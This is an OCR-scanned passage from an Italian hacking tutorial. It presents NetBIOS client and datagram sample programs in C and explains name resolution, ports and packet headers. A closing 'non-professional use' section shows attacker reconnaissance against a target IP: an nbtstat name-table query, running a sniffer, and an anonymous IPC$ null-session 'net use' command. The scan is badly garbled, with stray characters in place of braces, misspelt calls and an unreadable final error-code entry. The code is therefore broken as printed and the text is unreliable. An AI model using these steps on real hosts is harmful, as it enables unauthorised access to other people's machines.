#define MAX_SESSIONS 254 
#define MAX_NAMES 254 

#define MAX_B UFFER 1024 

char szServerName [NCBNAMSZ ] ; 

// 

// Function: Connect 
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// Invia un comando di connessione asincronpoad un numero LANA 
verso 

// il server. La struttura NCB pasata possiede il campo 

// ncb_event settato ad una event handle Windows valido. Basta 

// riempire negi blanks e fare la cali . 

// 

int Connect (PNCB pncb, int lana, char * server, char *client) 
{ 

pncb->ncb_command = NCBCALL / ASYNCH; 
pncb->ncb_lana_num = lana; 

memset (pncb->ncb_name, ' ' , NCBNAMSZ) ; 

strncpy (pncb->ncb_name, client, strlen (client) ) ; 

memset (pncb->ncb_callname, ' ', NCBNAMSZ) ; 

strncpy (pncb->ncb_callname , server, strlen (server) ) ; 

if (Netbios (pncb) != NRC_ GOODRET) 
{ 

printf ( "ERROR : Netbios: NCBCONNECT : %d\n", 

pncb->ncb_retcode) ; 
return pncb->ncb_retcode ; 

ì 



return NRC_ GOODRET; 



} 



// 

// Function: main 

// 

// Descrizione: 

// Inizializza l'interfaccia NetBIOS, alloca delle rsorse 

// (event handles, un buffer di spedizione ecc.), e invia una 

// NCBCALL per ogni LANA ad un server. Dopo che la connesione 

// è stta fatta, cancella o esetta ogni connessione in uscita. 

// Quindi invia/riceve i dati. 

// 

int main (int argc, char **argv) 
{ 

HANDLE *hArray; 
NCB *pncb; 

char szSendBuff [MAX_BUFFER ] ; 

DWORD dwBufferLen, 

dwRet, 

dwlndex, 

dwNum; 

LANAENUM lenum; 
int i; 

if (argc != 3) 
{ 

printf ("usage: nbclient CL IENT—NAME SERVER— NAME\n " ) ; 
return 1; 

} 

// Enumerate ali LANAs and reset each one 

// 

if (LanaEnum(& lenum) != NRC_ GOODRET) 
return 1; 

if (ResetAll (&lenum, (UCHAR)MAX_SESSIONS, (UCHAR) MAX_NAMES, 
FALSE) != NRC_ GOODRET) 
return 1; 
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strcpy (szServerName, argv[2 ] ) ; 

// 

// Alloca un array per gestire gli eventi asincroni . 
// Alloca anche un array di strutture NCB. Abbiamo bisogno di 
un handle 

// e di un NCB per ogni numero LANA. 

// 

hArray = (HANDLE *) GlobalAlloc (GMEM_FIXED, 

sizeof (HANDLE) * lenum . length) ; 
pncb = (NCB *) GlobalAlloc (GMEM_FIXED \ GMEM_ ZERO INI T, 

sizeof (NCB) * lenum . length) ; 

// 

// Crea un evento, lo assegna al corrispondente NCB 

// , einia una connessione assincrona (NCBCALL) . 

// In aggiunta, non dimentichiamoci d aggiungere il nome client 

// per ogni numer LANA alla quale vogliamo collegarci . 

// 

for(i = 0; i < lenum . length ; i++) 
{ 

hArray [i] = CreateEvent (NULL, TRUE, FALSE, NULL) ; 
pncb [i] . ncb_event = hArray [i ] ; 

AddName (lenum. lana [i] , argv[l], SdwNum) ; 

Connect (Spncb [i] , lenum. lana [i] , szServerName, argv[l]); 

ì 

// Attende fino a quando avviene una connessione 

// 

dwlndex = WaitForMultipleObjects (lenum. length, hArray, FALSE, 

INFINITE) ; 
if (dwlndex == WAIT_FAILED) 
{ 

printf ("ERROR: WaitForMultipleObjects: %d\n", 
GetLastError () ) ; 

} 

else 
{ 

// Se più' di uan connessione capita, sgancia le connessioni 

in più 

// Useremo la connessione restituita da 
// WaitForMultipleObjects. 

// 

for(i = 0; i < lenum . length ; i++) 
{ 

if (i != dwlndex) 
{ 

if (pncb[i] . ncb_cmd_cplt == NRC_PENDING) 
Cancel (&pncb[i ] ) ; 

else 

Hangup (pncb [i ] . ncb_lana_num, pncb [i] . ncb_lsn) ; 

} 

ì 

printf ("Connect ed on LANA: %d\n", pncb [dwlndex] . ncb_lana_num) 

// 

// Invia e riceve un messaggio 

// 

for(i = 0; i < 20; i++) 
{ 

wsprintf (szSendBuff, "Test message %03d", i) ; 
dwRet = Send (pncb [dwlndex] . ncb_lana_num, 
pncb [ dwlndex ] . ncb_lsn, szSendBuff, 
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strlen (szSendBuff) ) ; 
if (dwRet != NRC_ GOODRET) 
break; 

dwBufferLen = MAX_B UFFER ; 

dwRet = Recv (pncb [dwlndex] . ncb_lana_num, 

pncb [dwlndex] . ncb_lsn, szSendBuff, SdwBufferLen) ; 
if (dwRet != NRC_ GOODRET) 

break; 

szSendBuff [dwBufferLen] = 0; 
printff "Read: '%s'\n ", szSendBuff) ; 

ì 

Hangup (pncb [dwlndex ] . ncb_lana_num, pncb [ dwlndex ] . ncb_lsn) ; 

} 

// Pulisce 

// 

for(i = 0 ; i < lenum . length ; i++) 
{ 

DelName (lenum. lana [i] , argv[l] ) ; 
CloseHandle (hArray[i] ) ; 

} 

GlobalFree (hArray) ; 
GlobalFree (pncb) ; 




1 1 datagramma 

Abbiamo parlato sino ad ora di datagrammi inviati. 
Ma cosa sono questi ? 

In poche parole sono metodi di comunicazione non basati sulla connessione. 

In genere servono a gestire eventi asincroni come ad esempio nell'ambito del protocollo 

TCP/IP ad inviare dei pacchetti UDP. 

Esattamente come nel caso dei pacchetti UDP non viene eseguito nessun controllo di 

integrità su questo tipo di pacchetti pacchetti. 

Ci sono tre modi per gestire la spedizione di datagrammi. 

Il primo è quello di inviare direttamente ad un nome specifico. 

Il secondo metodo è quello di inviare ad un nome di gruppo. 

Il terzo metodo è quello di eseguire un broadcast a tutta la rete. 

Un esempio di programma per la gesione dei daagrammi a livelo di NetBiosè il seguente. 



// Nbdgram . c 






^include <windows.h> 






# include <stdio.h> 






^include <stdlib.h> 






^include " . . \Common\nbcommon . h" 






#define MAX_SESSIONS 


254 




#define MAX_NAMES 


254 




#define MAX_DATAGRAM_ SIZE 


512 




BOOL bSender = FALSE, 




// Send or receive datagrams 


bRecvAny = FALSE, 




// Receive for any name 


bUniqueName = TRUE, 




// Register my name as unique? 


bBroadcast = FALSE, 




// Use broadcast datagrams? 


bOneLana = FALSE; 




// Use ali LANAs or just one? 


char szLocalName [NCBNAMSZ + 1] , 


// Locai NetBIOS name 


szRecipientName [NCBNAMSZ 


+ il; 


// Recipient 's NetBIOS name 


DWORD dwNumDatagrams = 25, 




// Number of datagrams to send 
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dwOneLana, // If using one LANA, which one 

dwDelay = 0; // Delay between datagram sends 

// 

// Function: ValidateArgs 

// 

// Description : 

// This function parses the command line arguments 

// and sets various global flags indicating the selections 

// 

void ValidateArgs (int argc, char **argv) 
{ 

int i; 
for(i = 1; i < argc; i++) 
{ 

if (strlen (argv[i] ) < 2) 
continue; 

if (<argv[i][0] == '-') Il (argv[i] [0] == '/')) 
{ 

switch (tolower (argv[i] [1] ) ) 
{ 

case 'n ' : // Use a unique name 

bUniqueName = TRUE; 
if (strlen (argv[i] ) > 2) 

strcpy (szLocalName, &argv[i ] [3] ) ; 
break; 

case ' g ' : // Use a group name 

bUniqueName = FALSE; 
if (strlen (argv[i] ) > 2) 

strcpy (szLocalName, Sargv[i ] [3] ) ; 
break; 

case 's': // Send datagrams 

bSender = TRUE; 
break; 

case 'c' : // # of datagrams to send or receive 

if (strlen (argv[i] ) > 2) 

dwNumDatagrams = atoi (&argv[i] [3] ) ; 
break; 

case 'r' : // Recipient's name for datagrams 

if (strlen (argv[i] ) > 2) 

strcpy (szRecipientName, Sargv[i ] [3] ) ; 
break; 

case 'b ' : // Use broadcast datagrams 

bBroadcast = TRUE; 
break; 

case 'a ' : // Receive datagrams on any name 

bRecvAny = TRUE; 
break; 

case '1': // Operate on this LANA only 

bOneLana = TRUE; 
if (strlen (argv[i] ) > 2) 

dwOneLana = atoi (&argv[i] [3] ) ; 
break; 

case 'd' : // Delay (millisecs) between sends 

if (strlen (argv[i] ) > 2) 

dwDelay = atoi (&argv[i] [3] ) ; 

break; 
de fault : 
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printf ( "usage : nbdgram ? \n ") ; 
break.; 

ì 

ì 

} 

return; 

} 

// 

// Function: DatagramSend 

// 

// Descriptlon : 

// Send a directed datagram to the specified recipient on the 
// specified LANA number front the given name number to the 
// specified recipient . Also specified is the data buffer and 
// the number of bytes to send. 

// 

int DatagramSend (int lana, int num, char *recipient, 
char *buffer, int buflen) 

{ 

NCB ncb; 

ZeroMemory (Sncb, sizeof (NCB) ) ; 
ncb . ncb_command = NCBDGSEND ; 
ncb . ncb_lana_num = lana; 
ncb.ncb_num = num; 
ncb . ncbjbuffer = (PUCHAR) buffer; 
ncb . ncb_length = buflen; 

memset (ncb . ncb_callname , ' ', NCBNAMSZ) ; 

strncpy (ncb . ncb_callname , recipient, strlen (recipient) ) ; 

if (Netbios (&ncb) != NRC_ GOODRET) 
{ 

printf ("Netbios: NCBDGSEND failed: %d\n", ncb. ncb_ret code ) ; 
return ncb . ncb_retcode ; 

} 

return NRC_ GOODRET; 

} 

// 

// Function: DatagramSendBC 

// 

// Description: 

// Send a broadcast datagram on the specified LANA number from the 

// given name number. Also specified is the data buffer and the nu 
mber 

// of bytes to send. 

// 

int DatagramSendBC (int lana, int num, char *buffer, int buflen) 
{ 

NCB ncb; 

ZeroMemory ( Sncb, sizeof (NCB) ) ; 
ncb . ncb_command = NCBDGSENDBC; 
ncb . ncb_lana_num = lana; 
ncb.ncb_num = num; 
ncb . ncb_buffer = (PUCHAR) buffer; 
ncb . ncb_length = buflen; 
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if (Netbios (&ncb) != NRC_ GOODRET) 

{ 

printf ("Netbios: NCBDGSENDBC failed: %d\n", ncb.ncb_retcode) ; 
return ncb . ncb_retcode; 

ì 

return NRC_ GOODRET; 

} 

// 

// Function: DatagramRecv 

// 

// Description : 

// Receive a datagram on the given LANA number directed toward the 
// name represented by num. Data is copied into the supplied buffe 
r . 

// If hEvent is not 0, the receive cali is made asynchronously 
// with the supplied event handle. If num is OxFF, listen for a 
// datagram destined for any NetBIOS name registered by the proces 
s . 

// 

int DatagramRecv (PNCB pncb, int lana, int num, char *buffer, 
int buflen, HANDLE hEvent) 

{ 

ZeroMemory (pncb, sizeof (NCB) ) ; 

if (hEvent) 

{ 

pncb->ncb_command = NCBDGRECV \ ASYNCH; 
pncb->ncb_event = hEvent; 

) 

else 

pncb->ncb_command = NCBDGRECV; 
pncb->ncb_lana_num = lana; 
pncb->ncb_num = num; 
pncb->ncb_buffer = (PUCHAR) buffer; 
pncb->ncb_length = buflen; 

if (Netbios (pncb) != NRC_ GOODRET) 
{ 

printf ("Netbos: NCBDGRECV failed: %d\n", pncb->ncb_retcode) ; 
return pncb->ncb_retcode ; 

) 

return NRC_ GOODRET; 

} 

// 

// Function: DatagramRecvBC 

// 

// Description : 

// Receive a broadcast datagram on the given LANA number. 
// Data is copied into the supplied buffer. If hEvent is not 0, 
// the receive cali is made asynchronously with the supplied 
// event handle. 

// 

int DatagramRecvBC (PNCB pncb, int lana, int num, char *buffer, 

int buflen, HANDLE hEvent) 

{ 

ZeroMemory (pncb, sizeof (NCB) ) ; 

if (hEvent) 

{ 

pncb->ncb_command = NCBDGRECVBC / ASYNCH; 
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pncb->ncb_event = hEvent; 

} 

else 

pncb->ncb_command = NCBDGRECVBC; 
pncb->ncb_lana_num = lana; 
pncb->ncb_num = num; 
pncb->ncb_buffer = (PUCHAR) buffer; 
pncb->ncb_length = buflen; 

if (Netbios (pncb) != NRC_ GOODRET) 
{ 

printf ("Netbios: NCBDGRECVBC failed: %d\n", pncb- 
>ncb_retcode) ; 

return pncb->ncb_retcode ; 

ì 

return NRC_ GOODRET; 

ì 

// 

// Function: main 

// 

// Description: 

// Initialize the NetBIOS interface, allocate resources, and then 
// send or receive datagrams according to the user's options 

// 

int main(int argc, char **argv) 
{ 

LANAENUM lenum; 



int i, j; 

char szMessage [MAX_DATAGRAM_SIZE ] , 

szSender [NCBNAMSZ + 1] ; 

DWORD *dwNum = NULL, 

dwByt esRead, 
dwErr; 



ValidateArgs (argc, argv) ; 

// 

// Enumerate and reset the LANA numbers 

// 

if ( (dwErr = LanaEnum (& lenum) ) != NRC_ GOODRET) 
{ 

printf ("LanaEnum failed: %d\n", dwErr) ; 
return 1; 

ì 

if ( (dwErr = Reset Ali (& lenum, (UCHAR)MAX_SESSIONS, 
(UCHAR) MAX_NAMES , FALSE)) != NRC_GOODRET) 

{ 

printf ("ResetAll failed: %d\n", dwErr) ; 
return 1; 

ì 

// 

// This buffer holds the name number for the NetBIOS name added 
// to each LANA 

// 

dwNum = (DWORD *) GlobalAlloc (GMEM_FIXED \ GMEM_ ZERO INI T, 

sizeof (DWORD) * lenum . length) ; 
if (dwNum == NULL) 
{ 

printf ("out of memory\n ") ; 
return 1; 
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// 

// If we 're going to operate on only one LANA, register the name 
// on only that speci fied LANA; otherwise, register it on ali 
// LANAs 

// 

if (bOneLana) 
{ 

if (bUniqueName) 

AddName (dwOneLana, szLocalName, &dwNum [0] ) ; 

else 

AddGroupName (dwOneLana, szLocalName, &dwNum[0 ] ) ; 

} 

else 
{ 

for(i = 0; i < lenum . length ; i++) 
{ 

if (bUniqueName) 

AddName (lenum. lana [i] , szLocalName, &dwNum[i] ) ; 

else 

AddGroupName (lenum. lana [i] , szLocalName, &dwNum[i] ) ; 

ì 

} 

// We are sending datagrams 

// 

if (bSender) 
{ 

// Broadcast sender 

// 

if (bBroadcast) 
{ 

if (bOneLana) 
{ 

// Broadcast the message on the one LANA only 

// 

for(j = 0; j < dwNumDatagrams ; j++) 
{ 

wsprintf (szMessage, 

"[%03d] Test broadcast datagram", j) ; 
if (DatagramSendBC (dwOneLana, dwNum [0] , 

szMessage, strlen (szMessage) ) 

!= NRC_ GOODRET) 

return 1; 
Sleep (dwDelay) ; 

) 

) 

else 
{ 

// Broadcast the message on every LANA on the locai 
// machine 

// 

for(j = 0; j < dwNumDatagrams; j++) 
{ 

for(i = 0; i < lenum . length ; i++) 
{ 

wsprintf (szMessage, 

"[%03d] Test broadcast datagram", j) ; 
if (DatagramSendBC (lenum. lana [i] , dwNum[i], 

szMessage, strlen (szMessage) ) 

!= NRC_ GOODRET) 

return 1; 
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} 

Sleep (dwDelay) ; 

} 

} 



ì 

else 
{ 



if (bOneLana) 
{ 

// Send a directed message to the one LANA specified 

// 

for(j = 0; j < dwNumDatagrams ; j++) 
{ 

wsprintf (szMessage, 

"[%03d] Test directed datagram", j) ; 
if (DatagramSend (dwOneLana , dwNum[0], 

szRecipientName, szMessage, 

strlen (szMessage) ) != NRC_ GOODRET) 

return 1; 
Sleep (dwDelay) ; 

} 

} 

else 
{ 

// Send a directed message to each LANA on the 
// locai machine 

// 

for(j = 0; j < dwNumDatagrams; 
{ 

for(i = 0; i < lenum . length ; i++) 
{ 

wsprintf (szMessage, 

"[%03d] Test directed datagram", j) ; 
printf ("count: %d.%d\n", j,i); 
if ( DatagramSend (lenum. lana [i] , dwNum[i], 

szRecipientName, szMessage, 

strlen (szMessage) ) != NRC_ GOODRET) 

return 1; 

) 

Sleep (dwDelay) ; 

} 



} 



) 

else // We are receiving datagrams 

{ 

NCB *ncb=NULL; 

char **szMessageArray = NULL; 

HANDLE *hEvent=NULL; 

DWORD dwRet; 

// Allocate an array of NCB structure to submit to each recv 
// on each LANA 

// 

ncb = (NCB *)GlobalAlloc(GMEM_FIXED / GMEM_ ZERO INI T, 
sizeof (NCB) * lenum . length) ; 

// 

// Allocate an array of incoming data buffers 

// 

szMessage Array = (char **) GlobalAlloc (GMEM_FIXED, 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



sizeof (char *) * lenum . length) ; 
for(i = 0; i < lenum . length ; 

szMessage Array [i] = (char *) GlobalAlloc (GMEM_FIXED, 
MAX_DATAGRAM_SIZE) ; 

// 

// Allocate an array of event handles for 
// asynchronous receives 

// 

hEvent = (H AND LE *) GlobalAlloc (GMEM_FIXED \ GMEM_ ZERO INI T, 

sizeof (HANDLE) * lenum . length) ; 
for(i = 0; i < lenum. length; 

hEvent [i] = CreateEvent (0, TRUE, FALSE, 0) ; 

if (bBroadcast) 
{ 

if (bOneLana) 
{ 

// Post synchronous broadcast receives on 
// the one LANA speci fied 

// 

for(j = 0; j < dwNumDatagrams ; j++) 
{ 

if (DatagramRecvBC (&ncb [0] , dwOneLana, dwNum[0], 
szMessageArray [ 0] , MAX_DATAGRAM_ SIZE, 
NULL) != NRC_ GOODRE T) 
return 1; 

FormatNetbiosName (ncb [0 ] . ncb_callname , szSender) ; 

printf ("%03d [LANA %d] Message: '%s' " 
"received from: %s\n", j, 
ncb[0] . ncb_lana_num, szMessageArray [0] , 
szSender) ; 

} 

} 

else 
{ 

// Post asynchronous broadcast receives on each LANA 
// number available . For each command that succeeded, 

// print the message; otherwise, cancel the command. 

// 

for(j = 0; j < dwNumDatagrams; j++) 
{ 

for(i = 0; i < lenum . length ; i++) 
{ 

dwBytesRead = MAX_DATAGRAM_ SIZE; 

if (DatagramRecvBC (&ncb [i] , lenum. lana [i] , 

dwNum [i] , szMessageArray [i] , 

MAX_DATAGRAM_ SIZE, hEvent [i] ) 

!= NRC_ GOODRET) 

return 1; 

) 

dwRet = WaitForMultipleObjects (lenum. length, 

hEvent, FALSE, INFINITE); 
if (dwRet == WAIT_FAILED) 
{ 

printf ("WaitForMultipleObjects failed: %d\n", 

GetLastError () ) ; 
return 1; 

ì 

for(i = 0; i < lenum. length; i++) 
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{ 

if (ncb[i] . ncb_cmd_cplt == NRC_PENDING) 
Cancel (&ncb [i] ) ; 

else 
{ 

ncb[i] . ncb_buffer [ncb [i] .ncb_length] = 0; 
FormatNetbiosName (ncb[i ] . ncb_callname, 

szSender) ; 
printf("%03d [LANA %d] Message: ' %s ' " 

"received front: %s\n", j, 

ncb[i ] . ncb_lana_num, 

szMessageArray [i] , szSender) ; 

} 

ResetEvent (hEvent [1] ) ; 

} 

ì 

ì 

} 

else 
{ 

if (bOneLana) 
{ 

// Make a blocking datagram receive on the specified 
// LANA number 

// 

for(j = 0; j < dwNumDatagrams ; j++) 
{ 

if (bRecvAny) 
{ 

// Receive data destined for any NetBIOS name 
// in this process 's name table 

// 

if (DatagramRecv (Sncb [0] , dwOneLana, OxFF, 
szMessageArray [0] , MAX_DATAGRAM_ SIZE, 
NULL) != NRC_ GOODRET) 
return 1; 

} 

else 
{ 

if (DatagramRecv (&ncb [0] , dwOneLana, 
dwNum [0] , szMessageArray [0] , 
MAX_DATAGRAM_ SIZE, NULL) 
!= NRC_ GOODRET) 
return 1; 

ì 

FormatNetbiosName (ncb[0] . ncb_ callname, szSender) ; 

printf ("%03d [LANA %d] Message: '%s' " 
"received from: %s\n", j, 
ncb[0] . ncb_lana_num, szMessageArray [0] , 
szSender) ; 

ì 

) 

else 
{ 

// Post asynchronous datagram receives on each LANA 
// available . For ali those commands that succeeded, 
// print the data; otherwise, cancel the command. 

// 

for(j = 0; j < dwNumDatagrams; j++) 
{ 

for(i = 0; i < lenum. length; i++) 
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if (bRecvAny) 
{ 

// Recelve data destined for any NetBIOS 
// name in this process ' s name table 

// 

if (DatagramRecv (&ncb[i] , lenum. lana [i] , 
OxFF, szMessageArray [i] , 

MAX_DATAGRAM_ SIZE, hEvent[i]) 
!= NRC_ GOODRET) 
return 1; 

ì 

else 
{ 

if (DatagramRecv (&ncb [i] , lenum. lana [i] , 
dwNum [i] , szMessageArray [i] , 
MAX_DATAGRAM_ SIZE, hEvent[i]) 
!= NRC_ GOODRET) 
return 1; 



} 



} 

dwRet = WaitForMultipleObjects (lenum. length, 

hEvent, FALSE, INFINITE); 
if (dwRet == WAIT_FAILED) 
{ 

printf ("WaitForMultipleObjects failed: %d\n", 

GetLastError () ) ; 
return 1; 

ì 

for(i = 0; i < lenum . length ; i++) 
{ 

if (ncb[i] . ncb_cmd_cplt == NRC_PENDING) 
Cancel (&ncb [i] ) ; 

else 
{ 

ncb[i ] . ncb_buffer[ncb[i ] . ncb_length ] = 0; 

FormatNetbiosName (ncb [i] . ncb_callname, 
szSender) ; 

printf ("%03d [LANA %d] Message: '%s' " 

"from: %s\n", j, ncb [i] . ncb_lana_num, 
szMessageArray [i] , szSender) ; 

ì 

ResetEvent (hEvent [i] ) ; 

} 

ì 

ì 

} 

// Clean up 

// 

for(i = 0; i < lenum . length ; i++) 
{ 

CloseHandle (hEvent [i] ) ; 
GlobalFree (szMessageArray [i ] ) ; 

} 

GlobalFree (hEvent) ; 
GlobalFree (szMessageArray) ; 

) 

// Clean things up 

// 

if (bOneLana) 
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DelName (dwOneLana, szLocalName) ; 

else 
{ 

for(i = 0; 1 < lenum. length; 

DelName (lenum . lana [1] , szLocalName) ; 

} 

GlobalFree (dwNum) ; 
return 0; 



I parametri per il programma visto sono : 



Flag Meaning 

/n:my-name Register the unique name my-name. 

/g:group- Register the group name group-name. 
name 

/s Send datagrams (by default, the sample receives datagrams). 

Ic:n Send or receive n number of datagrams. 

/r.receiver Specify the NetBIOS name to send the datagrams to. 

/b Use broadcast datagrams. 

la Post receives for any NetBIOS name (set ncb_num to OxFF). 

IV.n Perform ali operations on LANA n only (by default, ali sends and receives 
are posted on each LANA). 

/d:n Wait n milliseconds between sends. 



Comandi vari N et Bios 

Il comando Adapter Status (NCBASTAT) serve ad ottenere lo stato di un computer locale e 
del suo numero LANA. 

Il comando restituisce una struttura ADAPTER STATUS con le informazioni. 
typedef struct _ADAPTER_ STATUS { 



UCHAR 


adapter_address [6] ; 


UCHAR 


rev_major; 


UCHAR 


reservedO ; 


UCHAR 


adapter_type ; 


UCHAR 


rev_minor; 


WORD 


duration; 


WORD 


frmr_recv; 


WORD 


frmr_xmit; 


WORD 


1 frame_ re cv_ err; 


WORD 


xmit_aborts ; 


DWORD 


xmit_success ; 


DWORD 


recv_success ; 


WORD 


1 frame_xmi t_ err; 


WORD 


recv_buff_unavail; 


WORD 


tl_timeouts; 


WORD 


ti_timeouts; 


DWORD 


reservedl ; 


WORD 


free_ncbs; 
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WORD 


max_ncbs ; 


WORD 


xmit_buf_unavail; 


WORD 


max_ dgram_ size; 


WORD 


pending_sess ; 


WORD 


max_cfg_sess; 


WORD 


max_sess; 


WORD 


max_sess_pkt_size; 


WORD 


name_count ; 


} ADAPTER 


_STATUS, *PADAP TER_ S TA TUS; 


typedef struct _NAME_BUFFER { 


UCHAR 


name [NCBNAMSZ ] ; 


UCHAR 


name_num; 


UCHAR 


name_flags; 



Un altro comando è il Find Name (NCBFINDNAME). 

Questo restituisce, solo in Windows NT e 2000, se qualche d'uno ha un certo nome 
registrato. 

Le informazioni sono restituite dentro ad una struttura FIND NAME HEADER. 



typedef struct _FIND_NAME_HEADER { 

WORD node_count ; 

UCHAR reserved; 

UCHAR unique_ grò up; 
} FIND_NAME_HEADER, *PFIND_NAME_HEADER; 

typedef struct _FIND_NAME_BUFFER { 



UCHAR 


length; 


UCHAR 


access_control ; 


UCHAR 


frame_ control; 


UCHAR 


destinatlon_addr [ 6] ; 


UCHAR 


source_addr [ 6] ; 


UCHAR 


routing_lnfo [18] ; 


} FIND_NAME_BUFFER, *PFIND_NAME_ B UFFER ; 



Uso non professionale di N et Bios 

Sicuramente molti interessati a questa serie di testi vorrebbe sapere qualche cosa di un pò 
differente rispetto all'uso normale di NetBios. 

Voglio subito disilludere chi pensa che NetBios offrà la possibilità di hackerare un sistema in 
quanto, ben esistendo questa possibilità, solo determinati sistemi, sempre di meno, offromo la 
possibilità di farlo. 

Vedremo dopo che percentuale relativa appunto a questa possibilità è in funzione delle patch 
usate. 

All'interno degli RFC descrittivi di NetBios, precisamente al'interno del RFC1000 e 1001 

vengono descritti tre tipi differenti di clients, più uno ibrido NetBios e precisamente B-nodes 

(broadcast), P-nodes (peer), M-nodes (mixed) and H-nodes (Hybrid). 

La differenza stà nel come questi negoziano il modo di risolvere il nome NetBios. 

Il tipo B-node cerca di usare un messaggio di broadcast medante un datagramma UDP, 

quella P-node invece si basa su un NetBIOS Name Server, mentre infine un M.node utilizza 

un metodo ibrido dato dai due appena visti. 

Il quanrto, I' h-node è simile al m-node solo che contatta prima un server WINS e dopo, se 
questo fallisce, cerca di contattare gli airi hosts usando un messaggio di broadcast. 
L'ordine con cui un h-node cerca di risolvere un nome NetBios su un indirizzo IP è quello che 
segue : 



Checks its NetBIOS name cache. 
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Performs a local-wire broadcast 
Checks the LMHOSTS file 



Checks the HOSTS file 




Come avevamo detto prima, tramite il comando nbtstatè possibile vedere i nomi registrati 
localmente: 

c:> nbtstat-n 

I valori riportati sono quelli che avevamo visto nelle tabelle iniziali di questo scritto. 
Sempre all'inizio avevamo detto che NetBios non è un protocollo instradabile per cui utilizza 
protocolli come TCP per esserlo. 

NetBios utilizza alcune porte di TCP per eseguire alcune funzioni. 
TCP 

o 139 - nbsession - NetBIOS session - es. net use \W 23.1 23.1 23.1 23\ipc$ "" 
/user:"" 

o 42 - WINS - Windows Internet Name System - (also UDP port 42) 



UDP 

o 137 - nbname - Name Queries - eg nbtstat -A 123.123.123.123 
o 138 - nbdatagram - UDP datagram services - eg net send /d:domain-name 
"Hello" 



Moltissimi attacchi sono stati portati avanti tramite l'utilizzo della porta 139. 

La struttura dei pacchetti NetBios dipende dal livello di trasporto del protocollo utilizzato. 

TCP 

Se il protocollo di trasporto utilizzato è il TCP, l'header di NetBios sarà lungo 4 bytes : 

Byte 1 : Packet Type 
Byte 2: Packets Flags 
Byte 3: Data size 
Byte 4: Data size 

Con due bytes disponibili per la dimensione dei pacchetti è possibile specificare fino a 65535 
bytes di dati. 

Se invece il protocollo di trasporto utilizzato è UDP la struttura si accorderà con il tipo di 
servizio in uso. 

Quando due sistemi vogliono comunicare mediante un trasporto eseguito da TCP , dopo che 

il circuito è stato creato, il tutto avviene tramite un handshake NetBios. 

Per dimostrare quanto detto damo un occhiata al caso in cui qualche d'uno invia un 

messaggio a qualche d'uno d'altro mediante un comando net send. 

Ad esempio : 
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Quando il nome NetBios viene risolto ad un determinato indirizzo IP, supponendo che questo 
si chiami JUPITER, quest'ultimo inizierà un handshake a tre vie TCP e quindi invierà un 
NetBIOS Session Request. 

Per eseguire questa richiesta il nome NetBios si dovrà ricorrere ad una funzione particolare in 
quanto i nomi NetBios accettano spazi mentre questo non è ammesso dalla gestione DNS. 
Questo processo prende i valori esadecimali di ogni lettera del nome e la slitta dentro a due 
parentesi (). 

Queste parentesi sono aggiunte al valore hex 41 (A) per creare due nuove lettere dove prima 
ce n'era una (EK). 

Ogni carattere non utilizzato è rimpiazzato con uno spazio (20 in HEX) e dopo viene mutilato 
per ottenere CA. 

In questo caso JSMITH registrato con il messeger service viene tramutato in 

EKFDENEJFEEICACACACACACACACACAAD 

Mentre JUPITER diventa 

EKFFFAEJ FE E FFCCACACACACACACACAAB 

L'header NetBios è settato a : 

Byte 1 : 81 h (session request) 
Byte 2 : OOh 
Byte 3 : OOh 
Byte 4 : 44h 

Il quarto byte dice a NetBios che I dati sono 68 bytes. 

Il nome massacrato occupa parte di questo e ogni nome è preceduto da 20h e terminato da 
OOh 

Il nome del ricevente NetBios è listato come primo. 

La risposta relativa alla sessione positiva è molto semplice : 82 00 00 00 - 82h inizia il tipo 
del pacchetto (risposta positiva della sessione) e dopo non essendoci flags e dati la 
dimensione è settata a 00 00. 

La sessione è ora settata tra JSMITH <03h> e JUPITER <01 h>. 

Il successivo pacchetto che il computer invia ha il seguente header NetBios : 00 00 00 3C 

Il tipo di pacchetto OOh significa che questo è un messaggio di sessione. 

L'ultimo byte è settato a 3Ch che ci dice che la lunghezza dei dati è 60 bytes. 

Il messaggio Ciao viene spedito utilizzando un protocollo SMB (Server Message Block). 

Dopo che il messaggio viene spedito viene ricevuta una replica : 00 00 00 23 che permette a 

JUPITER di sapere che il messaggio è stato ricevuto. 

Il modo che utilizza NT per autenticare gli utenti permette ad un attaccante di guadagnare il 
possss di una macchina. 

Per prima cosa è necessario richiedere la lista dei nomi registrati NetBios. 
Nel frattempo utilizzate un sniffer. 
Questo viene fatto con : 

C:> nbtstat -A 192.197.45.123 

Chiaramente l'ultimo numero è l'indirizzo IP della macchina a cui si vuole acccedere. 
La risposta potrebbe essere : 



NetBIOS Remote Machine Name Table 

Name Type Status 



KEVIN <00> UNIQUE Reglstered 

QHOME <00> GROUP Reglstered 

KEVIN <03> UNIQUE Reglstered 

TINY <03> UNIQUE Reglstered 
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MAC Address = 00-50-04-05-E2-B9 

In questo caso la persona non condivide nulla per cui sarà difficile riuscire a combinare 
qualch e cosa. 



Code 


Description 


00 


No error. 


01 


Illegal buffer length. A SEND BROADCAST or SEND DATAGRAM 
command specified a length greater than 512 bytes, or a status 
command specified a buffer length smaller than minimum allowed. 


03 


Invalid command. 


05 


Time out. For SEND, RECEIVE, and HANG UP commands, the time- 
out specified when the session was established has elapsed. For a 
CALL or ADAPTER STATUS command, an internai timer expired. 


06 


Message Incomplete. The buffer size specified in the NCB was not 
large enough to hold the receive data. For RECEIVE or RECEIVE ANY 
commands, the next command will get the rest of the data. For other 
commands, the remaining data is lost. 


08 


Invalid locai session number (LSN). 


09 


Out of resources. The Net Bios is out of some internai resource, such 
as buffers. Delay and reissue the command. 


0A 


Session closed. For a SEND, RECEIVE, RECEIVE ANY, or HANG UP, 
this indicates that the session was terminated by the remote computer. 


0B 


Command canceled. Command execution of the NCB was aborted by 
the CANCEL command. 


OD 


Duplicate locai name. An ADD NAME command specified an existing 
name. 0E Name table full. 


0F 


DELETE NAME completed, but name has active sessions (name will 
be deleted when ali sessions closed). 


11 


Locai session table full. 


12 


Remote computer not listening. On a CALL, the remote computer was 
found, but had no outstanding LISTEN for the CALL. 


13 


Invalid name number. 


14 


Name not found. S C-1 NET BIOS ERROR CODE LISTING (cont.) 
Code Description 


15 


Name not found or "*" or OOh in first byte of remote name field on a 
CALL. 


16 


Name already exists on network. 


17 


Name was deleted. 
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18 


Session terminateci abnormally. Connection with the remote computer 

VVdo lUol. 


1Q 
i 


Marno ponflipt Twwn pnmni ito re iicinn thp c q m o ncimp w/ac HptpptpH 
in di 1 1 e lui il noi. i vvu oui 1 1 pu itM o uoii iy UIC odllIC 1 Idi ! le VVdo UdCOltJU. 


C- 1 


